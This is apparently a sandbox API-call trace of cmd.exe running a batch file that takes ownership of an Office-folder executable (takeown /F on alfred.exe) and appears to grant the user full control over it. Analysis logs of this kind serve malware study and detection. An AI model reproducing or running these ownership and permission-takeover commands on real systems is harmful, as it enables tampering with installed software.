_wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0208.054] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0208.054] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0208.054] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0208.054] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0208.054] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0208.054] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0208.054] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0208.055] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0208.055] SetErrorMode (uMode=0x0) returned 0x0 [0208.055] SetErrorMode (uMode=0x1) returned 0x0 [0208.055] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x125cdd0, lpFilePart=0xfce664 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfce664*="Desktop") returned 0x1d [0208.055] SetErrorMode (uMode=0x0) returned 0x1 [0208.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0208.055] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.055] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.055] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0208.055] GetLastError () returned 0x2 [0208.056] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.056] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0208.056] GetLastError () returned 0x2 [0208.056] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0x125d170 [0208.056] FindClose (in: hFindFile=0x125d170 | out: hFindFile=0x125d170) returned 1 [0208.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0208.056] GetLastError () returned 0x2 [0208.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0x125d170 [0208.056] FindClose (in: hFindFile=0x125d170 | out: hFindFile=0x125d170) returned 1 [0208.057] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0208.057] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0208.057] GetConsoleTitleW (in: lpConsoleTitle=0xfce8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.057] InitializeProcThreadAttributeList (in: lpAttributeList=0xfce810, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfce7f4 | out: lpAttributeList=0xfce810, lpSize=0xfce7f4) returned 1 [0208.057] UpdateProcThreadAttribute (in: lpAttributeList=0xfce810, dwFlags=0x0, Attribute=0x60001, lpValue=0xfce7fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfce810, lpPreviousValue=0x0) returned 1 [0208.057] GetStartupInfoW (in: lpStartupInfo=0xfce848 | out: lpStartupInfo=0xfce848*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.057] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0208.058] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0208.058] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.058] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfce798*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfce7e4 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\"", lpProcessInformation=0xfce7e4*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x92c, dwThreadId=0xb38)) returned 1 [0208.717] CloseHandle (hObject=0xb8) returned 1 [0208.717] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.717] GetEnvironmentStringsW () returned 0x125e388* [0208.717] FreeEnvironmentStringsA (penv="=") returned 1 [0208.717] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0211.795] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xfce77c | out: lpExitCode=0xfce77c*=0x0) returned 1 [0211.796] CloseHandle (hObject=0xb0) returned 1 [0211.796] _vsnwprintf (in: _Buffer=0xfce864, _BufferCount=0x13, _Format="%08X", _ArgList=0xfce784 | out: _Buffer="00000000") returned 8 [0211.796] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.796] GetEnvironmentStringsW () returned 0x125e388* [0211.796] FreeEnvironmentStringsA (penv="=") returned 1 [0211.796] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.796] GetEnvironmentStringsW () returned 0x125e388* [0211.796] FreeEnvironmentStringsA (penv="=") returned 1 [0211.796] DeleteProcThreadAttributeList (in: lpAttributeList=0xfce810 | out: lpAttributeList=0xfce810) [0211.796] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.796] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0211.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.896] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0211.921] _get_osfhandle (_FileHandle=0) returned 0x38 [0211.921] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0211.931] SetConsoleInputExeNameW () returned 0x1 [0211.931] GetConsoleOutputCP () returned 0x1b5 [0211.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0211.940] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.946] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcefa4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0211.946] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0211.946] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.946] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0211.946] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.947] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0211.947] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0xb3, lpOverlapped=0x0) returned 1 [0211.947] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0211.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0211.947] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.947] GetFileType (hFile=0xb0) returned 0x1 [0211.947] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.947] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0211.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office 15\\alfred.exe", nBufferLength=0x208, lpBuffer=0xfce6f0, lpFilePart=0xfce6b4 | out: lpBuffer="C:\\Program Files\\Microsoft Office 15\\alfred.exe", lpFilePart=0xfce6b4*="alfred.exe") returned 0x2f [0211.948] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca80 [0211.948] FindClose (in: hFindFile=0x125ca80 | out: hFindFile=0x125ca80) returned 1 [0211.948] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0211.948] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office 15", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca80 [0211.948] FindClose (in: hFindFile=0x125ca80 | out: hFindFile=0x125ca80) returned 1 [0211.948] _wcsnicmp (_String1="MICROS~1", _String2="Microsoft Office 15", _MaxCount=0x13) returned 15 [0211.948] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office 15\\alfred.exe", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca80 [0211.948] FindClose (in: hFindFile=0x125ca80 | out: hFindFile=0x125ca80) returned 1 [0211.948] _wcsicmp (_String1="set", _String2=")") returned 74 [0211.948] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0211.948] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0211.948] _wcsicmp (_String1="IF", _String2="set") returned -10 [0211.948] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0211.948] _wcsicmp (_String1="REM", _String2="set") returned -1 [0211.948] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0211.949] _tell (_FileHandle=3) returned 63 [0211.949] _close (_FileHandle=3) returned 0 [0211.949] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfced38 | out: _Buffer="\r\n") returned 2 [0211.950] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.950] GetFileType (hFile=0x3c) returned 0x2 [0211.950] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.950] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced10 | out: lpMode=0xfced10) returned 1 [0211.956] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.956] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfced28, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfced28*=0x2) returned 1 [0211.961] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0211.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0211.961] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfced34 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0211.961] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfced34 | out: _Buffer=">") returned 1 [0211.961] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.961] GetFileType (hFile=0x3c) returned 0x2 [0211.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.961] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced14 | out: lpMode=0xfced14) returned 1 [0211.961] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.961] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfced2c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfced2c*=0x1e) returned 1 [0211.961] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.962] GetFileType (hFile=0x3c) returned 0x2 [0211.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.962] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefb4 | out: lpMode=0xfcefb4) returned 1 [0211.962] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.962] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1268188*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcefcc, lpReserved=0x0 | out: lpBuffer=0x1268188*, lpNumberOfCharsWritten=0xfcefcc*=0x3) returned 1 [0211.962] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefd4 | out: _Buffer=" FN=\"alfred.exe\" ") returned 17 [0211.962] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.962] GetFileType (hFile=0x3c) returned 0x2 [0211.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.962] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.962] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.962] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x11) returned 1 [0211.963] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcefe8 | out: _Buffer="\r\n") returned 2 [0211.963] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.963] GetFileType (hFile=0x3c) returned 0x2 [0211.963] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.963] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefc0 | out: lpMode=0xfcefc0) returned 1 [0211.963] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.963] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefd8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefd8*=0x2) returned 1 [0211.963] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0211.963] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0211.963] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0211.963] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0211.963] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0211.963] _wcsicmp (_String1="set", _String2="CD") returned 16 [0211.963] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0211.963] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0211.963] _wcsicmp (_String1="set", _String2="REN") returned 1 [0211.963] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0211.963] _wcsicmp (_String1="set", _String2="SET") returned 0 [0211.963] GetConsoleTitleW (in: lpConsoleTitle=0xfceb58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.964] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0211.964] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0211.964] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0211.964] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0211.964] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0211.964] _wcsicmp (_String1="set", _String2="CD") returned 16 [0211.964] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0211.964] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0211.964] _wcsicmp (_String1="set", _String2="REN") returned 1 [0211.964] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0211.964] _wcsicmp (_String1="set", _String2="SET") returned 0 [0211.964] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0211.964] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0211.964] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0211.964] SetEnvironmentVariableW (lpName="FN", lpValue="\"alfred.exe\"") returned 1 [0211.964] GetEnvironmentStringsW () returned 0x125cdc8* [0211.964] FreeEnvironmentStringsA (penv="=") returned 1 [0211.964] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.964] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0211.965] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.965] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0211.965] _get_osfhandle (_FileHandle=0) returned 0x38 [0211.965] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0211.965] SetConsoleInputExeNameW () returned 0x1 [0211.965] GetConsoleOutputCP () returned 0x1b5 [0211.965] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0211.965] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.966] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcefa4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0211.966] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0211.966] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.966] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0211.966] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.966] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0211.966] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0xa3, lpOverlapped=0x0) returned 1 [0211.966] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0211.966] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0211.966] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.966] GetFileType (hFile=0xb0) returned 0x1 [0211.966] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.966] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0211.970] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xfce6f0, lpFilePart=0xfce6b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xfce6b4*="vRnqNMBW.bat") returned 0x2a [0211.971] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca70 [0211.971] FindClose (in: hFindFile=0x125ca70 | out: hFindFile=0x125ca70) returned 1 [0211.971] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca70 [0211.971] FindClose (in: hFindFile=0x125ca70 | out: hFindFile=0x125ca70) returned 1 [0211.971] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0211.971] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca70 [0211.971] FindClose (in: hFindFile=0x125ca70 | out: hFindFile=0x125ca70) returned 1 [0211.971] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xfce3f8 | out: lpFindFileData=0xfce3f8) returned 0x125ca70 [0211.971] FindClose (in: hFindFile=0x125ca70 | out: hFindFile=0x125ca70) returned 1 [0211.971] _wcsicmp (_String1="cd", _String2=")") returned 58 [0211.971] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0211.971] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0211.971] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0211.972] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0211.972] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0211.972] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0211.972] _tell (_FileHandle=3) returned 78 [0211.972] _close (_FileHandle=3) returned 0 [0211.972] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfced38 | out: _Buffer="\r\n") returned 2 [0211.972] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.972] GetFileType (hFile=0x3c) returned 0x2 [0211.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.972] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced10 | out: lpMode=0xfced10) returned 1 [0211.973] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.973] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfced28, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfced28*=0x2) returned 1 [0211.973] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0211.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0211.973] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfced34 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0211.973] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfced34 | out: _Buffer=">") returned 1 [0211.973] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.973] GetFileType (hFile=0x3c) returned 0x2 [0211.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.973] GetConsoleMode (in: 